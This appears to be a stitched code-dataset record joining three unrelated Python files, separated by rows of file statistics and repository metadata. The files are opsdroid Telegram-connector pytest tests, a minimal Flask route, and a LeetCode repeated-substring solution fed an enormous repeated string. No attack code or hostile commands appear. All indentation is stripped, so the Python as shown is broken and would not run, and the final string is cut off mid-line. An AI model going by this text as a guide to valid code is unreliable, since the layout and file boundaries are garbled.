patched_request.return_value = asyncio.Future()
patched_request.return_value.set_result(response)
await connector.disconnect()
assert mocked_build_url.called
assert patched_request.called
assert "Sending deleteWebhook" in caplog.text
assert "Telegram webhook deleted" in caplog.text
@pytest.mark.asyncio
async def test_disconnect_failure(opsdroid, caplog):
caplog.set_level(logging.DEBUG)
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
response = amock.Mock()
response.status = 400
with amock.patch(
"aiohttp.ClientSession.get", new=amock.CoroutineMock()
) as patched_request, amock.patch.object(
connector, "build_url"
) as mocked_build_url:
patched_request.return_value = asyncio.Future()
patched_request.return_value.set_result(response)
await connector.disconnect()
assert mocked_build_url.called
assert patched_request.called
assert "Sending deleteWebhook" in caplog.text
assert "Unable to delete webhook" in caplog.text
@pytest.mark.asyncio
async def test_edited_message_event(opsdroid):
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
mock_request = amock.CoroutineMock()
mock_request.json = amock.CoroutineMock()
mock_request.json.return_value = {
"update_id": 639974040,
"edited_message": {
"message_id": 1247,
"from": {
"id": 6399348,
"is_bot": False,
"first_name": "Fabio",
"last_name": "Rosado",
"username": "FabioRosado",
"language_code": "en",
},
"chat": {
"id": 6399348,
"first_name": "Fabio",
"last_name": "Rosado",
"username": "FabioRosado",
"type": "private",
},
"date": 1603818326,
"edit_date": 1603818330,
"text": "hi",
},
}
edited_message = opsdroid_events.EditedMessage("hi", 6399348, "Fabio", 6399348)
await connector.telegram_webhook_handler(mock_request)
assert "hi" in edited_message.text
assert "Fabio" in edited_message.user
assert edited_message.target == 6399348
assert edited_message.user_id == 6399348
@pytest.mark.asyncio
async def test_join_group_event(opsdroid):
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
mock_request = amock.CoroutineMock()
mock_request.json = amock.CoroutineMock()
mock_request.json.return_value = {
"update_id": 639974040,
"message": {
"message_id": 1247,
"from": {
"id": 6399348,
"is_bot": False,
"first_name": "Fabio",
"last_name": "Rosado",
"username": "FabioRosado",
"language_code": "en",
},
"chat": {
"id": 6399348,
"first_name": "Fabio",
"last_name": "Rosado",
"username": "FabioRosado",
"type": "private",
},
"date": 1603818326,
"edit_date": 1603818330,
"new_chat_member": True,
},
}
join_message = opsdroid_events.JoinGroup(6399348, "Fabio", 6399348)
await connector.telegram_webhook_handler(mock_request)
assert "Fabio" in join_message.user
assert join_message.target == 6399348
assert join_message.user_id == 6399348
@pytest.mark.asyncio
async def test_leave_group_event(opsdroid):
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
mock_request = amock.CoroutineMock()
mock_request.json = amock.CoroutineMock()
mock_request.json.return_value = {
"update_id": 639974040,
"message": {
"message_id": 1247,
"from": {
"id": 6399348,
"is_bot": False,
"first_name": "Fabio",
"last_name": "Rosado",
"username": "FabioRosado",
"language_code": "en",
},
"chat": {
"id": 6399348,
"first_name": "Fabio",
"last_name": "Rosado",
"username": "FabioRosado",
"type": "private",
},
"date": 1603818326,
"edit_date": 1603818330,
"left_chat_member": True,
},
}
left_message = opsdroid_events.LeaveGroup(6399348, "Fabio", 6399348)
await connector.telegram_webhook_handler(mock_request)
assert "Fabio" in left_message.user
assert left_message.target == 6399348
assert left_message.user_id == 6399348
@pytest.mark.asyncio
async def test_pinned_message_event(opsdroid):
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
mock_request = amock.CoroutineMock()
mock_request.json = amock.CoroutineMock()
mock_request.json.return_value = {
"update_id": 639974040,
"message": {
"message_id": 1247,
"from": {
"id": 6399348,
"is_bot": False,
"first_name": "Fabio",
"last_name": "Rosado",
"username": "FabioRosado",
"language_code": "en",
},
"chat": {
"id": 6399348,
"first_name": "Fabio",
"last_name": "Rosado",
"username": "FabioRosado",
"type": "private",
},
"date": 1603818326,
"edit_date": 1603818330,
"pinned_message": True,
},
}
pinned_message = opsdroid_events.PinMessage(6399348, "Fabio", 6399348)
await connector.telegram_webhook_handler(mock_request)
assert "Fabio" in pinned_message.user
assert pinned_message.target == 6399348
assert pinned_message.user_id == 6399348
@pytest.mark.asyncio
async def test_reply_to_message_event(opsdroid):
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
mock_request = amock.CoroutineMock()
mock_request.json = amock.CoroutineMock()
mock_request.json.return_value = {
"update_id": 639974084,
"message": {
"message_id": 1272,
"from": {
"id": 639348,
"is_bot": False,
"first_name": "Fabio",
"last_name": "Rosado",
"username": "FabioRosado",
"language_code": "en",
},
"chat": {
"id": 639348,
"first_name": "Fabio",
"last_name": "Rosado",
"username": "FabioRosado",
"type": "private",
},
"date": 1603834922,
"reply_to_message": {
"message_id": 1271,
"from": {
"id": 639348,
"is_bot": False,
"first_name": "Fabio",
"last_name": "Rosado",
"username": "FabioRosado",
"language_code": "en",
},
"chat": {
"id": 63948,
"first_name": "Fabio",
"last_name": "Rosado",
"username": "FabioRosado",
"type": "private",
},
"date": 1603834912,
"text": "Hi",
},
"text": "This is a reply",
},
}
reply_message = opsdroid_events.Reply(
"This is a reply", 639348, "FabioRosado", 63948
)
await connector.telegram_webhook_handler(mock_request)
assert "This is a reply" in reply_message.text
assert "FabioRosado" in reply_message.user
assert reply_message.target == 63948
@pytest.mark.asyncio
async def test_location_event(opsdroid):
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
mock_request = amock.CoroutineMock()
mock_request.json = amock.CoroutineMock()
mock_request.json.return_value = {
"update_id": 639974101,
"message": {
"message_id": 42,
"from": {
"id": 1087968824,
"is_bot": True,
"first_name": "Group",
"username": "GroupAnonymousBot",
},
"chat": {
"id": -1001417735217,
"title": "Opsdroid-test Chat",
"type": "supergroup",
},
"date": 1603992829,
"location": {"latitude": 56.159849, "longitude": -5.230604},
},
}
event_location = telegram_events.Location(
{"location": {"latitude": 56.159849, "longitude": -5.230604}},
56.159849,
-5.230604,
)
await connector.telegram_webhook_handler(mock_request)
assert event_location.latitude == 56.159849
assert event_location.longitude == -5.230604
@pytest.mark.asyncio
async def test_poll_event(opsdroid):
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
mock_request = amock.CoroutineMock()
mock_request.json = amock.CoroutineMock()
mock_request.json.return_value = {
"update_id": 639974103,
"message": {
"message_id": 44,
"from": {
"id": 1087968824,
"is_bot": True,
"first_name": "Group",
"username": "GroupAnonymousBot",
},
"chat": {
"id": -1001417735217,
"title": "Opsdroid-test Chat",
"type": "supergroup",
},
"date": 1603993170,
"poll": {
"id": "5825895662671101957",
"question": "Test",
"options": [
{"text": "Test", "voter_count": 0},
{"text": "Testing", "voter_count": 0},
],
"total_voter_count": 0,
"is_closed": False,
"is_anonymous": True,
"type": "regular",
"allows_multiple_answers": False,
},
},
}
poll_event = telegram_events.Poll(
{
"question": "question",
"option": ["option1", "option2"],
"total_voter_count": 1,
},
"question",
["option1", "option2"],
1,
)
await connector.telegram_webhook_handler(mock_request)
assert poll_event.question == "question"
assert poll_event.options == ["option1", "option2"]
assert poll_event.total_votes == 1
@pytest.mark.asyncio
async def test_contact_event(opsdroid):
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
mock_request = amock.CoroutineMock()
mock_request.json = amock.CoroutineMock()
mock_request.json.return_value = {
"update_id": 1,
"message": {
"chat": {"id": 321},
"from": {"id": 123},
"contact": {"phone_number": 123456, "first_name": "opsdroid"},
},
}
contact_event = telegram_events.Contact(
{"phone_number": 123456, "first_name": "opsdroid"}, 123456, "opsdroid"
)
await connector.telegram_webhook_handler(mock_request)
assert contact_event.first_name == "opsdroid"
assert contact_event.phone_number == 123456
@pytest.mark.asyncio
async def test_unparseable_event(opsdroid, caplog):
caplog.set_level(logging.DEBUG)
opsdroid.config["web"] = {"base-url": "https://test.com"}
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
message = {
"update_id": 1,
"message": {
"message_id": 1279,
"from": {
"id": 639889348,
"is_bot": False,
"first_name": "Fabio",
"last_name": "Rosado",
"username": "FabioRosado",
"language_code": "en",
},
"chat": {
"id": 639889348,
"first_name": "Fabio",
"last_name": "Rosado",
"username": "FabioRosado",
"type": "private",
},
"date": 1604013500,
"sticker": {
"width": 512,
"height": 512,
"emoji": "👌",
"set_name": "HotCherry",
"is_animated": True,
"file_size": 42311,
},
},
}
event = await connector.handle_messages(message, "opsdroid", 0, 1)
assert "Received unparsable event" in caplog.text
assert event is None
@pytest.mark.asyncio
async def test_channel_post(opsdroid):
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
mock_request = amock.CoroutineMock()
mock_request.json = amock.CoroutineMock()
mock_request.json.return_value = {
"update_id": 639974037,
"channel_post": {
"message_id": 4,
"chat": {"id": -1001474709998, "title": "Opsdroid-test", "type": "channel"},
"date": 1603817533,
"text": "dance",
},
}
message = opsdroid_events.Message("dance", 4, opsdroid)
await connector.telegram_webhook_handler(mock_request)
assert message.text == "dance"


@pytest.mark.asyncio
async def test_parse_user_no_permissions(opsdroid):
mock_request = amock.CoroutineMock()
mock_request.json = amock.CoroutineMock()
mock_request.json.return_value = {
"update_id": 639974077,
"message": {
"message_id": 31,
"from": {"id": 100000, "is_bot": False, "username": "FabioRosado"},
"chat": {
"id": -10014170000,
"title": "Opsdroid-test Chat",
"type": "supergroup",
},
"date": 1603827368,
"text": "hi",
},
}
connector_config["whitelisted-users"] = [1, "AllowedUser"]
connector_config["reply-unauthorized"] = True
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
with amock.patch.object(connector, "send_message") as mocked_send_message:
await connector.telegram_webhook_handler(mock_request)
assert mocked_send_message.called


@pytest.mark.asyncio
async def test_parse_user_permissions(opsdroid):
mock_request = amock.CoroutineMock()
mock_request.json = amock.CoroutineMock()
mock_request.json.return_value = {
"update_id": 639974077,
"message": {
"message_id": 31,
"from": {"id": 100000, "is_bot": False, "username": "FabioRosado"},
"chat": {
"id": -10014170000,
"title": "Opsdroid-test Chat",
"type": "supergroup",
},
"date": 1603827368,
"text": "hi",
},
}
connector_config["whitelisted-users"] = ["FabioRosado", 100000]
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
with amock.patch.object(connector.opsdroid, "parse") as mocked_parse:
await connector.telegram_webhook_handler(mock_request)
assert mocked_parse.called
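The tests above rely on `amock.CoroutineMock` from the third-party asynctest package to make `request.json()` awaitable. On Python 3.8+ the standard library's `unittest.mock.AsyncMock` covers the same pattern; a minimal, self-contained sketch (the `handler` function here is hypothetical, not part of the connector):

```python
# Minimal recreation of the mocking pattern used in the tests above, with the
# stdlib AsyncMock (Python 3.8+) instead of asynctest's CoroutineMock.
import asyncio
from unittest.mock import AsyncMock

mock_request = AsyncMock()
# Child attributes of an AsyncMock are AsyncMocks too, so awaiting
# mock_request.json() yields the configured payload.
mock_request.json.return_value = {"update_id": 1, "message": {"text": "hi"}}

async def handler(request):
    payload = await request.json()
    return payload["message"]["text"]

print(asyncio.run(handler(mock_request)))  # prints: hi
```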
| 29.634578 | 88 | 0.59172 | 2,968 | 30,168 | 5.80155 | 0.086253 | 0.035774 | 0.042163 | 0.076195 | 0.831639 | 0.826297 | 0.806086 | 0.772983 | 0.759336 | 0.735815 | 0 | 0.05832 | 0.291236 | 30,168 | 1,017 | 89 | 29.663717 | 0.746937 | 0 | 0 | 0.663717 | 0 | 0.002528 | 0.162424 | 0.015381 | 0 | 0 | 0 | 0 | 0.11378 | 1 | 0.013906 | false | 0 | 0.00885 | 0 | 0.022756 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
174ecfefbed674f3ba2ed3b722871cfa4037526c | 160 | py | Python | module2/views.py | LawAlias/gisflask | 4fb2ae3bb4b7717b86a6fa816db2fc338ebd574e | [
"Apache-2.0"
] | 17 | 2019-03-22T01:01:10.000Z | 2022-03-03T09:56:51.000Z | module2/views.py | LawAlias/gisflask | 4fb2ae3bb4b7717b86a6fa816db2fc338ebd574e | [
"Apache-2.0"
] | null | null | null | module2/views.py | LawAlias/gisflask | 4fb2ae3bb4b7717b86a6fa816db2fc338ebd574e | [
"Apache-2.0"
] | 12 | 2019-03-22T13:30:23.000Z | 2020-05-15T05:36:17.000Z | from flask import flash, render_template
from module2 import app


@app.route('/module2', methods=['GET', 'POST'])
def module2():
return ('module2 load success') | 32 | 45 | 0.7375 | 22 | 160 | 5.318182 | 0.727273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028169 | 0.1125 | 160 | 5 | 46 | 32 | 0.795775 | 0 | 0 | 0 | 0 | 0 | 0.217391 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0.4 | 0.2 | 0.8 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
bd7bbf50df66af4fbd8ad42a43be731685f819fb | 10,254 | py | Python | src/459. Repeated Substring Pattern.py | xiaonanln/myleetcode-python | 95d282f21a257f937cd22ef20c3590a69919e307 | [
"Apache-2.0"
] | null | null | null | src/459. Repeated Substring Pattern.py | xiaonanln/myleetcode-python | 95d282f21a257f937cd22ef20c3590a69919e307 | [
"Apache-2.0"
] | null | null | null | src/459. Repeated Substring Pattern.py | xiaonanln/myleetcode-python | 95d282f21a257f937cd22ef20c3590a69919e307 | [
"Apache-2.0"
] | null | null | null | class Solution(object):
def repeatedSubstringPattern(self, s):
"""
:type s: str
:rtype: bool
"""
if not s: return True
return s in (s+s)[1:-1]
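The one-liner above uses the doubling trick: a string built from a repeated unit reappears inside `s + s` even after the first and last characters are removed, while a non-periodic string does not. A standalone sketch (not part of the original file) cross-checks the trick against a brute-force definition:

```python
# Cross-check the (s + s)[1:-1] doubling trick against brute force:
# s has a repeated substring pattern iff some proper prefix of length k
# (k divides len(s), k <= len(s) // 2) tiles the whole string.
def brute_force(s: str) -> bool:
    return any(
        s == s[:k] * (len(s) // k)
        for k in range(1, len(s) // 2 + 1)
        if len(s) % k == 0
    )

for s in ["abab", "aba", "abcabcabc", "a", "abac"]:
    assert (s in (s + s)[1:-1]) == brute_force(s)
```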


print(Solution().repeatedSubstringPattern("abab"))
print(Solution().repeatedSubstringPattern("czmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyv
egurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyv
egurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyv
egurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyv
egurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnu